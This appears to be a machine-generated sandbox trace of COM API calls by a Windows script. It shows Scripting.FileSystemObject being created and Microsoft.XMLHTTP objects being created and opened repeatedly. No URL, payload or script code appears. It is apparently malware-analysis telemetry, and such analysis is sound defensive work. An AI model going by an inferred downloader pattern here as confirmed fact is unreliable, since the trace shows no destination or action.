	[0389.930] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0389.930] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0389.930] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0389.930] ??2@YAPEAX_K@Z () returned 0x62f350
	[0389.930] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0389.930] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0389.930] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0389.930] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0389.930] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0389.930] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0389.930] SysStringLen (param_1=0x0) returned 0x0
	[0389.930] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0389.933] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0389.933] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0389.933] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0389.933] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0389.933] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0389.933] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0390.526] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0390.526] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0390.527] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0390.528] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0390.528] SysStringLen (param_1=0x0) returned 0x0
	[0390.528] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0390.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0390.528] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0390.528] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0390.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0390.528] ??2@YAPEAX_K@Z () returned 0x62f310
	[0390.528] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0390.528] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0390.528] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0390.528] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0390.529] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0390.529] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.529] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0390.531] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.531] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0390.531] SysStringLen (param_1=0x0) returned 0x0
	[0390.531] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0390.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0390.532] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0390.532] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0390.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0390.532] ??2@YAPEAX_K@Z () returned 0x62f330
	[0390.532] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f330) 
	[0390.532] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0390.532] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0390.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0390.532] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0390.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.532] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0390.532] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.532] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0390.532] SysStringLen (param_1=0x0) returned 0x0
	[0390.532] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0390.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0390.533] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0390.533] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0390.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7828) returned 0x0
	[0390.533] ??2@YAPEAX_K@Z () returned 0x62f310
	[0390.533] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7828, pUnkSite=0x62f310) 
	[0390.533] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0390.533] XMLHTTPRequest:IUnknown:Release (This=0x49c7828) returned 0x0
	[0390.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0390.533] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0390.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.533] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0390.533] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.534] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0390.534] SysStringLen (param_1=0x0) returned 0x0
	[0390.534] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0390.534] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0390.534] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0390.534] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0390.534] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0390.534] ??2@YAPEAX_K@Z () returned 0x62f330
	[0390.534] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0390.534] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0390.534] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0390.534] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0390.534] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0390.534] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.534] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0390.534] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.534] longjmp () 
	[0390.535] longjmp () 
	[0390.535] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0390.535] SysStringLen (param_1=0x0) returned 0x0
	[0390.535] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0390.535] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0390.535] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0390.535] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0390.535] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7828) returned 0x0
	[0390.535] ??2@YAPEAX_K@Z () returned 0x62f310
	[0390.535] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7828, pUnkSite=0x62f310) 
	[0390.535] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0390.535] XMLHTTPRequest:IUnknown:Release (This=0x49c7828) returned 0x0
	[0390.535] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0390.535] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0390.535] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0390.535] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0390.536] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0390.536] longjmp () 
	[0390.536] longjmp () 
	[0390.536] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0390.536] SysStringLen (param_1=0x0) returned 0x0
